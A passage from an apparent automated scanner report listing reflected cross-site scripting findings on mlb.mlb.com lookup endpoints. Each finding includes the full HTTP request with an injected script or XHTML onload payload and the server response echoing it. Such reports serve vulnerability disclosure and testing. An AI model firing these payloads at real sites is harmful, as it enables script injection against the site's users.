Summary

Severity:   High
Confidence:   Certain
Host:   http://mlb.mlb.com
Path:   /lookup/json/named.org_game_type_date_info.bam

Issue detail

The value of the sport_code request parameter is copied into the HTML document as plain text between tags. The payload 6dc0c<script>alert(1)</script>6bf97234ae2 was submitted in the sport_code parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /lookup/json/named.org_game_type_date_info.bam?sport_code=6dc0c<script>alert(1)</script>6bf97234ae2&current_sw='Y'&game_type='S'&game_type='R'&game_type='A'&game_type='D'&game_type='L'&game_type='W'&season=2011 HTTP/1.1
Host: mlb.mlb.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://mlb.mlb.com/stats/sortable.jsp?c_id=mlb&tcid=mm_mlb_stats
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: homeObj.drawer.disable=true; stUtil_cookie=1%7C%7C4346219321317595822344; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Oracle-iPlanet-Web-Server/7.0
Content-Type: text;charset=ISO-8859-1
Content-Length: 98
Cache-Control: max-age=299
Date: Sun, 02 Oct 2011 22:55:47 GMT
Connection: close

sport_code must be a valid integer value and you passed: 6dc0c<script>alert(1)</script>6bf97234ae2

2.121. http://mlb.mlb.com/lookup/json/named.properties_season_splits.bam [season parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mlb.mlb.com
Path:   /lookup/json/named.properties_season_splits.bam

Issue detail

The value of the season request parameter is copied into the HTML document as plain text between tags. The payload eb4c9<script>alert(1)</script>3bb2fc80d72 was submitted in the season parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /lookup/json/named.properties_season_splits.bam?season=2011eb4c9<script>alert(1)</script>3bb2fc80d72&stat_type=1&v=3 HTTP/1.1
Host: mlb.mlb.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://mlb.mlb.com/stats/sortable.jsp?c_id=mlb&tcid=mm_mlb_stats
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: homeObj.drawer.disable=true; stUtil_cookie=1%7C%7C4346219321317595822344; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Oracle-iPlanet-Web-Server/7.0
Content-Type: text;charset=ISO-8859-1
Content-Length: 99
Cache-Control: max-age=300
Date: Sun, 02 Oct 2011 22:55:45 GMT
Connection: close

season must be a valid integer value and you passed: 2011eb4c9<script>alert(1)</script>3bb2fc80d72

2.122. http://mlb.mlb.com/lookup/json/named.schedule_series.bam [game_type parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mlb.mlb.com
Path:   /lookup/json/named.schedule_series.bam

Issue detail

The value of the game_type request parameter is copied into the HTML document as plain text between tags. The payload 4076b<script>alert(1)</script>4bb89352961 was submitted in the game_type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /lookup/json/named.schedule_series.bam?season=2011&sport_code='mlb'&game_type=4076b<script>alert(1)</script>4bb89352961 HTTP/1.1
Host: mlb.mlb.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://mlb.mlb.com/index.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stUtil_cookie=1%7C%7C4346219321317595822344; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Oracle-iPlanet-Web-Server/7.0
Content-Type: text;charset=ISO-8859-1
Content-Length: 97
Cache-Control: max-age=278
Date: Sun, 02 Oct 2011 22:51:28 GMT
Connection: close

game_type must be a valid integer value and you passed: 4076b<script>alert(1)</script>4bb89352961

2.123. http://mlb.mlb.com/lookup/json/named.schedule_series.bam [season parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mlb.mlb.com
Path:   /lookup/json/named.schedule_series.bam

Issue detail

The value of the season request parameter is copied into the HTML document as plain text between tags. The payload ba88d<script>alert(1)</script>3406a323a60 was submitted in the season parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /lookup/json/named.schedule_series.bam?season=2011ba88d<script>alert(1)</script>3406a323a60&sport_code='mlb'&game_type='D' HTTP/1.1
Host: mlb.mlb.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://mlb.mlb.com/index.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stUtil_cookie=1%7C%7C4346219321317595822344; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Oracle-iPlanet-Web-Server/7.0
Content-Type: text;charset=ISO-8859-1
Content-Length: 99
Cache-Control: max-age=297
Date: Sun, 02 Oct 2011 22:51:25 GMT
Connection: close

season must be a valid integer value and you passed: 2011ba88d<script>alert(1)</script>3406a323a60

2.124. http://mlb.mlb.com/lookup/json/named.schedule_series.bam [sport_code parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mlb.mlb.com
Path:   /lookup/json/named.schedule_series.bam

Issue detail

The value of the sport_code request parameter is copied into the HTML document as plain text between tags. The payload af64f<script>alert(1)</script>9367318d0b9 was submitted in the sport_code parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /lookup/json/named.schedule_series.bam?season=2011&sport_code=af64f<script>alert(1)</script>9367318d0b9&game_type='D' HTTP/1.1
Host: mlb.mlb.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://mlb.mlb.com/index.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stUtil_cookie=1%7C%7C4346219321317595822344; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Oracle-iPlanet-Web-Server/7.0
Content-Type: text;charset=ISO-8859-1
Content-Length: 99
Cache-Control: max-age=287
Date: Sun, 02 Oct 2011 22:51:27 GMT
Connection: close

sport_code must be a valid integer value and you passed: af64f<script>alert(1)</script>9367318d0b9

2.125. http://mlb.mlb.com/lookup/json/named.team_all_season.bam [all_star_sw parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mlb.mlb.com
Path:   /lookup/json/named.team_all_season.bam

Issue detail

The value of the all_star_sw request parameter is copied into the HTML document as plain text between tags. The payload fc18d<script>alert(1)</script>17400399bd2 was submitted in the all_star_sw parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /lookup/json/named.team_all_season.bam?all_star_sw=fc18d<script>alert(1)</script>17400399bd2&sport_code='mlb'&sort_order='name_asc'&season=2011 HTTP/1.1
Host: mlb.mlb.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://mlb.mlb.com/stats/sortable.jsp?c_id=mlb&tcid=mm_mlb_stats
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: homeObj.drawer.disable=true; stUtil_cookie=1%7C%7C4346219321317595822344; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Oracle-iPlanet-Web-Server/7.0
Content-Type: text;charset=ISO-8859-1
Content-Length: 99
Cache-Control: max-age=300
Date: Sun, 02 Oct 2011 22:55:39 GMT
Connection: close

all_star_sw must be a valid integer value and you passed: fc18d<script>alert(1)</script>17400399bd2

2.126. http://mlb.mlb.com/lookup/json/named.team_all_season.bam [season parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mlb.mlb.com
Path:   /lookup/json/named.team_all_season.bam

Issue detail

The value of the season request parameter is copied into the HTML document as plain text between tags. The payload b0011<script>alert(1)</script>18b5dcaa26a was submitted in the season parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /lookup/json/named.team_all_season.bam?all_star_sw='N'&sport_code='mlb'&sort_order='name_asc'&season=2011b0011<script>alert(1)</script>18b5dcaa26a HTTP/1.1
Host: mlb.mlb.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://mlb.mlb.com/stats/sortable.jsp?c_id=mlb&tcid=mm_mlb_stats
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: homeObj.drawer.disable=true; stUtil_cookie=1%7C%7C4346219321317595822344; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Oracle-iPlanet-Web-Server/7.0
Content-Type: text;charset=ISO-8859-1
Content-Length: 98
Cache-Control: max-age=279
Date: Sun, 02 Oct 2011 22:55:44 GMT
Connection: close

season must be a valid integer value and you passed: 2011b0011<script>alert(1)</script>18b5dcaa26a

2.127. http://mlb.mlb.com/lookup/json/named.team_all_season.bam [sport_code parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mlb.mlb.com
Path:   /lookup/json/named.team_all_season.bam

Issue detail

The value of the sport_code request parameter is copied into the HTML document as plain text between tags. The payload 7a269<script>alert(1)</script>b15d36caf40 was submitted in the sport_code parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /lookup/json/named.team_all_season.bam?all_star_sw='N'&sport_code=7a269<script>alert(1)</script>b15d36caf40&sort_order='name_asc'&season=2011 HTTP/1.1
Host: mlb.mlb.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://mlb.mlb.com/stats/sortable.jsp?c_id=mlb&tcid=mm_mlb_stats
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: homeObj.drawer.disable=true; stUtil_cookie=1%7C%7C4346219321317595822344; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Oracle-iPlanet-Web-Server/7.0
Content-Type: text;charset=ISO-8859-1
Content-Length: 99
Cache-Control: max-age=296
Date: Sun, 02 Oct 2011 22:55:41 GMT
Connection: close

sport_code must be a valid integer value and you passed: 7a269<script>alert(1)</script>b15d36caf40

2.128. http://mlb.mlb.com/lookup/named.properties_info_events_season.bam [org_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mlb.mlb.com
Path:   /lookup/named.properties_info_events_season.bam

Issue detail

The value of the org_id request parameter is copied into the XML document as plain text between tags. The payload f669b<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>23a3982b8fe was submitted in the org_id parameter. This input was echoed as f669b<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>23a3982b8fe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

Request

GET /lookup/named.properties_info_events_season.bam?season=2011&sport_code='mlb'&org_id=1f669b<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>23a3982b8fe HTTP/1.1
Host: mlb.mlb.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/xml, text/xml, */*; q=0.01
Referer: http://mlb.mlb.com/index.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stUtil_cookie=1%7C%7C4346219321317595822344; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Oracle-iPlanet-Web-Server/7.0
Last-Modified: Sun, 02 Oct 2011 22:51:27 GMT
Content-Type: text/xml;charset=ISO-8859-1
Content-Length: 1411
Cache-Control: max-age=120
Date: Sun, 02 Oct 2011 22:51:27 GMT
Connection: close
Vary: Accept-Encoding

<!-- Copyright 2011 MLB Advanced Media, L.P. Use of any content on this page acknowledges agreement to the terms posted here http://gdx.mlb.com/components/copyright.txt --><properties_info_events_season>org_id must be a valid double value and you passed: 1f669b<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>23a3982b8fe<schedule_event_info>
...[SNIP]...

2.129. http://mlb.mlb.com/lookup/named.properties_info_events_season.bam [season parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mlb.mlb.com
Path:   /lookup/named.properties_info_events_season.bam

Issue detail

The value of the season request parameter is copied into the XML document as plain text between tags. The payload 83cc2<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>90e66fe3091 was submitted in the season parameter. This input was echoed as 83cc2<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>90e66fe3091 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

Request

GET /lookup/named.properties_info_events_season.bam?season=201183cc2<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>90e66fe3091&sport_code='mlb'&org_id=1 HTTP/1.1
Host: mlb.mlb.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/xml, text/xml, */*; q=0.01
Referer: http://mlb.mlb.com/index.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stUtil_cookie=1%7C%7C4346219321317595822344; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Oracle-iPlanet-Web-Server/7.0
Last-Modified: Sun, 02 Oct 2011 22:51:20 GMT
Content-Type: text/xml;charset=ISO-8859-1
Content-Length: 528
Cache-Control: max-age=120
Date: Sun, 02 Oct 2011 22:51:20 GMT
Connection: close
Vary: Accept-Encoding

<!-- Copyright 2011 MLB Advanced Media, L.P. Use of any content on this page acknowledges agreement to the terms posted here http://gdx.mlb.com/components/copyright.txt --><properties_info_events_season>season must be a valid double value and you passed: 201183cc2<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>90e66fe3091season must be a valid double value and you passed: 201183cc2<a xmlns:a='http://www.w3.org/1999/xhtml'>
...[SNIP]...

2.130. http://mlb.mlb.com/lookup/named.properties_info_events_season.bam [sport_code parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mlb.mlb.com
Path:   /lookup/named.properties_info_events_season.bam

Issue detail

The value of the sport_code request parameter is copied into the XML document as plain text between tags. The payload af614<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>e4f8b4d403d was submitted in the sport_code parameter. This input was echoed as af614<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>e4f8b4d403d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

Request

GET /lookup/named.properties_info_events_season.bam?season=2011&sport_code=af614<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>e4f8b4d403d&org_id=1 HTTP/1.1
Host: mlb.mlb.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/xml, text/xml, */*; q=0.01
Referer: http://mlb.mlb.com/index.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stUtil_cookie=1%7C%7C4346219321317595822344; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Oracle-iPlanet-Web-Server/7.0
Last-Modified: Sun, 02 Oct 2011 22:51:21 GMT
Content-Type: text/xml;charset=ISO-8859-1
Content-Length: 1144
Cache-Control: max-age=120
Date: Sun, 02 Oct 2011 22:51:21 GMT
Connection: close
Vary: Accept-Encoding

<!-- Copyright 2011 MLB Advanced Media, L.P. Use of any content on this page acknowledges agreement to the terms posted here http://gdx.mlb.com/components/copyright.txt --><properties_info_events_s
...[SNIP]...
</org_history>sport_code must be a valid double value and you passed: af614<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>e4f8b4d403d</properties_info_events_season>

2.131. http://mlb.mlb.com/lookup/named.standings_all_league_repeater.bam [league_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mlb.mlb.com
Path:   /lookup/named.standings_all_league_repeater.bam

Issue detail

The value of the league_id request parameter is copied into the HTML document as plain text between tags. The payload 83c43<script>alert(1)</script>275b810be46 was submitted in the league_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /lookup/named.standings_all_league_repeater.bam?sit_code='h0'&season=2011&standings_all.col_in=division_champ,place,wild_card,playoffs_sw,division_id,division,team_short,file_code,w,l,pct,gb&league_id=10383c43<script>alert(1)</script>275b810be46&league_id=104 HTTP/1.1
Host: mlb.mlb.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/xml, text/xml, */*; q=0.01
Referer: http://mlb.mlb.com/index.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stUtil_cookie=1%7C%7C4346219321317595822344; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 500 Internal Server Error
Server: Oracle-iPlanet-Web-Server/7.0
Content-Type: text;charset=ISO-8859-1
Content-Length: 149
Cneonction: close
X-N: S
Date: Sun, 02 Oct 2011 22:51:36 GMT
Connection: close

com.bamnetworks.lookup.servlet.LookupException: league_id must be a valid integer value and you passed: 10383c43<script>alert(1)</script>275b810be46

2.132. http://mlb.mlb.com/lookup/named.standings_all_league_repeater.bam [season parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mlb.mlb.com
Path:   /lookup/named.standings_all_league_repeater.bam

Issue detail

The value of the season request parameter is copied into the HTML document as plain text between tags. The payload 4a2c4<script>alert(1)</script>c7d498188e5 was submitted in the season parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /lookup/named.standings_all_league_repeater.bam?sit_code='h0'&season=20114a2c4<script>alert(1)</script>c7d498188e5&standings_all.col_in=division_champ,place,wild_card,playoffs_sw,division_id,division,team_short,file_code,w,l,pct,gb&league_id=103&league_id=104 HTTP/1.1
Host: mlb.mlb.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/xml, text/xml, */*; q=0.01
Referer: http://mlb.mlb.com/index.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stUtil_cookie=1%7C%7C4346219321317595822344; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 500 Internal Server Error
Server: Oracle-iPlanet-Web-Server/7.0
Content-Type: text;charset=ISO-8859-1
Content-Length: 147
Cneonction: close
X-N: S
Date: Sun, 02 Oct 2011 22:51:31 GMT
Connection: close

com.bamnetworks.lookup.servlet.LookupException: season must be a valid integer value and you passed: 20114a2c4<script>alert(1)</script>c7d498188e5

2.133. http://mlb.mlb.com/lookup/named.standings_all_league_repeater.bam [sit_code parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mlb.mlb.com
Path:   /lookup/named.standings_all_league_repeater.bam

Issue detail

The value of the sit_code request parameter is copied into the HTML document as plain text between tags. The payload 8d396<script>alert(1)</script>2e73732a62a was submitted in the sit_code parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /lookup/named.standings_all_league_repeater.bam?sit_code=8d396<script>alert(1)</script>2e73732a62a&season=2011&standings_all.col_in=division_champ,place,wild_card,playoffs_sw,division_id,division,team_short,file_code,w,l,pct,gb&league_id=103&league_id=104 HTTP/1.1
Host: mlb.mlb.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/xml, text/xml, */*; q=0.01
Referer: http://mlb.mlb.com/index.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stUtil_cookie=1%7C%7C4346219321317595822344; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 500 Internal Server Error
Server: Oracle-iPlanet-Web-Server/7.0
Content-Type: text;charset=ISO-8859-1
Content-Length: 144
Cneonction: close
X-N: S
Date: Sun, 02 Oct 2011 22:51:27 GMT
Connection: close

com.bamnetworks.lookup.servlet.LookupException: sit_code must be a valid integer value and you passed: 8d396<script>alert(1)</script>2e73732a62a

2.134. http://mlb.mlb.com/lookup/named.standings_wild_card_league_repeater.bam [league_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mlb.mlb.com
Path:   /lookup/named.standings_wild_card_league_repeater.bam

Issue detail

The value of the league_id request parameter is copied into the HTML document as plain text between tags. The payload d1724<script>alert(1)</script>804d7574235 was submitted in the league_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /lookup/named.standings_wild_card_league_repeater.bam?sit_code='h0'&season=2011&results=5&standings_wild_card.col_in=team_short,file_code,w,l,pct,gb,wild_card&league_id=103d1724<script>alert(1)</script>804d7574235&league_id=104 HTTP/1.1
Host: mlb.mlb.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/xml, text/xml, */*; q=0.01
Referer: http://mlb.mlb.com/index.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stUtil_cookie=1%7C%7C4346219321317595822344; s_cc=true; homeObj.drawer.disable=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 500 Internal Server Error
Server: Oracle-iPlanet-Web-Server/7.0
Content-Type: text;charset=ISO-8859-1
Content-Length: 149
Cneonction: close
X-N: S
Date: Sun, 02 Oct 2011 22:51:55 GMT
Connection: close

com.bamnetworks.lookup.servlet.LookupException: league_id must be a valid integer value and you passed: 103d1724<script>alert(1)</script>804d7574235

2.135. http://mlb.mlb.com/lookup/named.standings_wild_card_league_repeater.bam [results parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mlb.mlb.com
Path:   /lookup/named.standings_wild_card_league_repeater.bam

Issue detail

The value of the results request parameter is copied into the HTML document as plain text between tags. The payload d1b6e<script>alert(1)</script>ee980f71c89 was submitted in the results parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /lookup/named.standings_wild_card_league_repeater.bam?sit_code='h0'&season=2011&results=5d1b6e<script>alert(1)</script>ee980f71c89&standings_wild_card.col_in=team_short,file_code,w,l,pct,gb,wild_card&league_id=103&league_id=104 HTTP/1.1
Host: mlb.mlb.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/xml, text/xml, */*; q=0.01
Referer: http://mlb.mlb.com/index.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stUtil_cookie=1%7C%7C4346219321317595822344; s_cc=true; homeObj.drawer.disable=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 500 Internal Server Error
Server: Oracle-iPlanet-Web-Server/7.0
Content-Type: text;charset=ISO-8859-1
Content-Length: 145
Cneonction: close
X-N: S
Date: Sun, 02 Oct 2011 22:51:51 GMT
Connection: close

com.bamnetworks.lookup.servlet.LookupException: results must be a valid integer value and you passed: 5d1b6e<script>alert(1)</script>ee980f71c89

2.136. http://mlb.mlb.com/lookup/named.standings_wild_card_league_repeater.bam [season parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mlb.mlb.com
Path:   /lookup/named.standings_wild_card_league_repeater.bam

Issue detail

The value of the season request parameter is copied into the HTML document as plain text between tags. The payload 2f5ba<script>alert(1)</script>8d0bc9b171a was submitted in the season parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /lookup/named.standings_wild_card_league_repeater.bam?sit_code='h0'&season=20112f5ba<script>alert(1)</script>8d0bc9b171a&results=5&standings_wild_card.col_in=team_short,file_code,w,l,pct,gb,wild_card&league_id=103&league_id=104 HTTP/1.1
Host: mlb.mlb.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/xml, text/xml, */*; q=0.01
Referer: http://mlb.mlb.com/index.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
